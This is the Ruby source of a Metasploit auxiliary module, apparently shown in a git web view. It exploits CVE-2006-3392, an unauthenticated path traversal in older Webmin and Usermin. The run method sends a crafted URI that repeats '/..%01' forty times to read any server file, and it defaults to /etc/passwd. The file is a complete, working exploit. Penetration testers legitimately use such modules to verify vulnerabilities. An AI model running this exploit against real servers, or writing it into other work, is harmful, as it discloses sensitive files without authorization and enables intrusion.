metasploit-framework/modules/auxiliary/admin/webmin/file_disclosure.rb

82 lines
2.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin File Disclosure',
'Description' => %q{
A vulnerability has been reported in Webmin and Usermin, which can be
exploited by malicious people to disclose potentially sensitive information.
The vulnerability is caused due to an unspecified error within the handling
of an URL. This can be exploited to read the contents of any files on the
server via a specially crafted URL, without requiring a valid login.
The vulnerability has been reported in Webmin (versions prior to 1.290) and
Usermin (versions prior to 1.220).
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '26772'],
['BID', '18744'],
['CVE', '2006-3392'],
['US-CERT-VU', '999601'],
['URL', 'http://secunia.com/advisories/20892/'],
],
'DisclosureDate' => 'Jun 30 2006',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(10000),
OptString.new('RPATH',
[
true,
"The file to download",
"/etc/passwd"
]
),
OptString.new('DIR',
[
true,
"Webmin directory path",
"/unauthenticated"
]
),
], self.class)
end
2013-08-30 21:28:54 +00:00
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
2013-08-30 21:28:54 +00:00
dir = normalize_uri(datastore['DIR'])
uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
2013-08-30 21:28:54 +00:00
res = send_request_raw({
'uri' => uri,
}, 10)
2013-08-30 21:28:54 +00:00
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print(res.body)
else
print_status("No response from the server")
end
end
2012-03-18 05:07:27 +00:00
end